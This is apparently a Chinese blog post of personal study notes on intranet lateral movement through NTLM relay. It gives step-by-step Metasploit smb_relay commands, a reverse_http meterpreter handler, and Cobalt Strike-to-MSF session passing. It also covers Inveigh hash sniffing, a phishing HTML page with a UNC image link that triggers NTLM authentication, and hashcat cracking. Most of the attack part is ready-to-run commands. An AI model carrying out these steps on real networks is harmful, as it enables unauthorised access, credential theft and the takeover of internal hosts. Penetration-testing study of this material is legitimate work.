11、内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前提知识:

[一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线](#一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线)

1、CS权限转给MSF:

2、MSF:

3、添加路由:

4、smb_relay重发模块:

[5、受控主机输入命令:dir \\192.168.46.166\c](#5、受控主机输入命令:dir \\192.168.46.166\c)

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

1、监听拦截

2、触发拦截

2.1、钓鱼触发

3、破解密文


前提知识:

CS上线后,system高权限用户切换至低权限用户

ps命令 查看所需用户权限的进程号

steal_token 1668 切换至进程号为1668的用户权限

MSF上线后, 高权限用户切换低权限用户

migrate 1992 #1992是PID号,所需用户权限的PID

dir命令理解

一、横向移动-NTLM 中继攻击-Relay 重放-SMB 上线

192.168.46.166 kali 取得内网webserver权限建立路由能访问3网段

让内网中一台主机上线后,输入命令:dir \\192.168.46.166\c$,kali(192.168.46.166) msf的smb_relay模块做了一个转发攻击,即中继攻击,转发至192.168.3.32,最终使192.168.3.32上线到MSF。
条件:两台主机用户密码一致

1、CS权限转给MSF:

复制代码
spawn l-msf

2、MSF:

复制代码
监听上线:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
run

3、添加路由:

复制代码
run autoroute -p    //查看当前路由表
run post/multi/manage/autoroute    //添加当前路由表
backgroup   //返回

4、smb_relay重发模块:

复制代码
use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32   //转发攻击目标
set lhost 192.168.46.166    //设置本地 IP
set autorunscript post/windows/manage/migrate

主动连接:
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
run 

5、受控主机输入命令:dir \\192.168.46.166\c$

由于kali(192.168.46.166)的smb_relay重发模块做了中继攻击,使得主机192.168.3.32上线到kali MSF

二、横向移动-NTLM中继攻击-Inveigh嗅探-Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh

1、监听拦截

Inveigh.exe

2、触发拦截

复制代码
dir \\192.168.3.x\c$
2.1、钓鱼触发

http://192.168.3.31/1.html

复制代码
<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、破解密文

复制代码
 hashcat -m 5600 hash pass.txt --show
相关推荐
虚构之人4 小时前
二进制漏洞挖掘(WinAFL Fuzzing)Windows篇
汇编·网络安全·信息安全·系统安全
原来是你~呀~5 小时前
CAI:人机协作的模块化网络安全AI框架
网络安全·自动化渗透测试
xixixi777775 小时前
今日 AI 、通信、安全前沿日报(2026 年 2 月 5 日,星期四)
人工智能·网络安全·ai·信息安全·大模型·通信·前沿
浩浩测试一下8 小时前
内网---> ForceChangePassword 权限滥用
java·服务器·网络·安全·web安全·网络安全·系统安全
NOVAnet20238 小时前
南凌科技「Bot防护」:让恶意爬虫、刷票薅羊毛等自动化攻击无处遁形
爬虫·科技·网络安全·自动化·南凌科技
Whoami!8 小时前
⓫⁄₁₂ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 未加引号服务路径漏洞利用(下)
网络安全·信息安全·windows服务·未加引号服务路径
ccino .8 小时前
【官方最新VMware workstation pro获取】
运维·网络安全·自动化
世界尽头与你1 天前
(修复方案)kibana 未授权访问漏洞
安全·网络安全·渗透测试
独角鲸网络安全实验室1 天前
WhisperPair漏洞突袭:谷歌Fast Pair协议失守,数亿蓝牙设备陷静默劫持危机
网络安全·数据安全·漏洞·蓝牙耳机·智能设备·fast pair·cve-2025-36911
lingggggaaaa1 天前
安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增扩展&打乱HASH
学习·安全·web安全·网络安全·golang·哈希算法